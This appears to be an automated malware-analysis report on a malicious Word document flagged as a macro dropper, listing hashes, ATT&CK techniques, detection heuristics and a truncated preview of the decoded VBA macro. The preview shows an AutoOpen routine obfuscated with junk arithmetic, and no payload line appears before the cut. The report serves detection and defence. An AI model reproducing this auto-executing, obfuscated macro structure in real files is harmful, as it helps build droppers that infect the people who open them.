Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd492e2cd0f18bf0…

MALICIOUS

Office (OLE)

122.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 752dbb7512d8035e11849fa0d7f488b3 SHA-1: 950618a6e5887cbff4741b4dd0e139579474788b SHA-256: bd492e2cd0f18bf045ae272d00e3043275c5df7745d3441c1680ceba44a9b68a
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6831115-0' further supports this dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6831115-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6831115-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83681 bytes
SHA-256: 13a8cd24e95f5521b0e4815a978b75cfed8b0d972838b63534216ccc91ff7e34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim BTKahkDrndnkq
BTKahkDrndnkq = 5569 / 9713 / 2444

Dim VSnaQWLcCczQnV
VSnaQWLcCczQnV = 9713 - 6879
Dim NVQHpGkggqK
NVQHpGkggqK = VSnaQWLcCczQnV - BTKahkDrndnkq - 2658857
Dim LCKdDhjgvwPGK
LCKdDhjgvwPGK = 7199 / 5729 / 8482

Dim qHRvGRxQhNFhGJ
qHRvGRxQhNFhGJ = 5729 - 3343
Dim TJWQvfaGSavwlR
TJWQvfaGSavwlR = qHRvGRxQhNFhGJ - LCKdDhjgvwPGK - 73214298
Dim VKPwSwlRbtiZlB
Dim PkfDjmMJiVX
PkfDjmMJiVX = 7733 / 7598 / 5592

Dim jqdbMWadgcVNkh
jqdbMWadgcVNkh = 7598 - 8291
Dim TWHClMfQPnfzQa
TWHClMfQPnfzQa = jqdbMWadgcVNkh - PkfDjmMJiVX - 97752698
VKPwSwlRbtiZlB = 728 / 7315 / 8786
Dim FGWRDVZjPpBg
FGWRDVZjPpBg = 5629 / 9779 / 7075

Dim lTSwgcDbdg
lTSwgcDbdg = 9779 - 4026
Dim BxMGWWrLJwqZ
BxMGWWrLJwqZ = lTSwgcDbdg - FGWRDVZjPpBg - 70422386
Dim gwhqlSajSqxkrk
gwhqlSajSqxkrk = 7097 / 8282 / 7592

Dim drvapqfGgLF
drvapqfGgLF = 8282 - 8416
Dim czlMfgzBBxVF
czlMfgzBBxVF = drvapqfGgLF - gwhqlSajSqxkrk - 49952608

Dim pfwninfrkiZ
pfwninfrkiZ = 9292 / 2579 / 2838

Dim CKbNqbclncbk
CKbNqbclncbk = 2579 - 6879
Dim VgBJZmKTDKQQ
VgBJZmKTDKQQ = CKbNqbclncbk - pfwninfrkiZ - 14108614
Dim zQFCKWvaLrrB
Dim ZBNJvqNziWFFHL
ZBNJvqNziWFFHL = 8231 / 9292 / 1378

Dim vCWPHvJWhism
vCWPHvJWhism = 9292 - 6418
Dim WWNkcpwjBWbXp
WWNkcpwjBWbXp = vCWPHvJWhism - ZBNJvqNziWFFHL - 11469081
Dim VDiMwNamXMbZs
VDiMwNamXMbZs = 6383 / 1594 / 5441

Dim lcLZkcxHtDLHzqnc
lcLZkcxHtDLHzqnc = 1594 - 9562
Dim GbPHPKlwLLBt
GbPHPKlwLLBt = lcLZkcxHtDLHzqnc - VDiMwNamXMbZs - 22657869
zQFCKWvaLrrB = 7315 - 7959
Dim BDZiXcaNgHmpft
BDZiXcaNgHmpft = 3293 / 7320 / 2533

Dim lxwmxFRtchxKR
lxwmxFRtchxKR = 7320 - 1789
Dim fiDhPXrrQKB
fiDhPXrrQKB = lxwmxFRtchxKR - BDZiXcaNgHmpft - 5099288
Dim aVLFWLJMfxPHa
aVLFWLJMfxPHa = 5368 / 6329 / 2368

Dim cszMjKKqKgj
cszMjKKqKgj = 6329 - 6429
Dim gphZWaHHqkCj
gphZWaHHqkCj = cszMjKKqKgj - aVLFWLJMfxPHa - 29836372
Dim MBLvgLigmjSLSc
MBLvgLigmjSLSc = zQFCKWvaLrrB - VKPwSwlRbtiZlB - 44953600
Dim RhdVtHrfbsMBNkcv
RhdVtHrfbsMBNkcv = 6044 / 4552 / 4382

Dim XahLbZfprPJRq
XahLbZfprPJRq = 4552 - 679
Dim ZQdPPXJfcPxBZ
ZQdPPXJfcPxBZ = XahLbZfprPJRq - RhdVtHrfbsMBNkcv - 10738988
Dim cxcFsnDtJGii
cxcFsnDtJGii = 5475 / 5804 / 33

Dim VTxNXPLzQzTQ
VTxNXPLzQzTQ = 5804 - 5420
Dim HgVDCLplKKXn
HgVDCLplKKXn = VTxNXPLzQzTQ - cxcFsnDtJGii - 32977473

Dim WFHNhvWPkSVMJwxh
Dim QGxSnxWBRwKf
QGxSnxWBRwKf = 99 / 1144 / 5538

Dim wFsPaKClrHmxfMZ
wFsPaKClrHmxfMZ = 1144 - 3209
Dim aNCPGnLkrRDZB
aNCPGnLkrRDZB = wFsPaKClrHmxfMZ - QGxSnxWBRwKf - 1099317
WFHNhvWPkSVMJwxh = 4469 / 8485 / 9454
Dim qTPdPrMPvQTRixX
qTPdPrMPvQTRixX = 6671 / 8983 / 9774

Dim HNxCGhfMvNB
HNxCGhfMvNB = 8983 - 2210
Dim cPVsfXSSxmNvT
cPVsfXSSxmNvT = HNxCGhfMvNB - qTPdPrMPvQTRixX - 18361447

Dim nHsqgstWcr
nHsqgstWcr = 7338 / 4001 / 5474

Dim fWmPlRcBDQBCM
fWmPlRcBDQBCM = 4001 - 935
Dim FQZPjPhwiwN
FQZPjPhwiwN = fWmPlRcBDQBCM - nHsqgstWcr - 9621344
Dim BrQBJaLwfgDfvcmw
Dim RLaKxLVgJL
RLaKxLVgJL = 7177 / 6702 / 8416

Dim WMrrnzhrJcp
WMrrnzhrJcp = 6702 - 2815
Dim lqGVNKPhczSl
lqGVNKPhczSl = WMrrnzhrJcp - RLaKxLVgJL - 70552
BrQBJaLwfgDfvcmw = 8485 - 2964
Dim hHbSMLiaKbnWF
Dim tcKXFrhpaH
tcKXFrhpaH = 6505 / 650 / 6186

Dim wKJpWiHPzz
wKJpWiHPzz = 650 - 7351
Dim mbLKfkLRqPScmR
mbLKfkLRqPScmR = wKJpWiHPzz - tcKXFrhpaH - 5304259
hHbSMLiaKbnWF = BrQBJaLwfgDfvcmw - WFHNhvWPkSVMJwxh - 68359671

Dim LgcKsmtRPPaDCX
LgcKsmtRPPaDCX = 3942 / 723 / 1982

Dim nSTqRFmkpjZs
nSTqRFmkpjZs = 723 - 3248
Dim jtrmnvsjFmQtb
jtrmnvsjFmQtb = nSTqRFmkpjZs - LgcKsmtRPPaDCX - 405391

Dim jLpLcPXhKF
Dim RHNBwFGqjfB
RHNBwFGqjfB = 4750 / 494 / 4569

Dim zcGGcXqVCSWdhC
zcGGcXqVCSWdhC = 494 - 2667
Dim qBJrNfSHsBhwr
qBJrNfSHsBhwr = zcGGcXqVCSWdhC - RHNBwFGqjfB - 8670834
jLpLcPXhKF = 6762 / 663 / 406
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.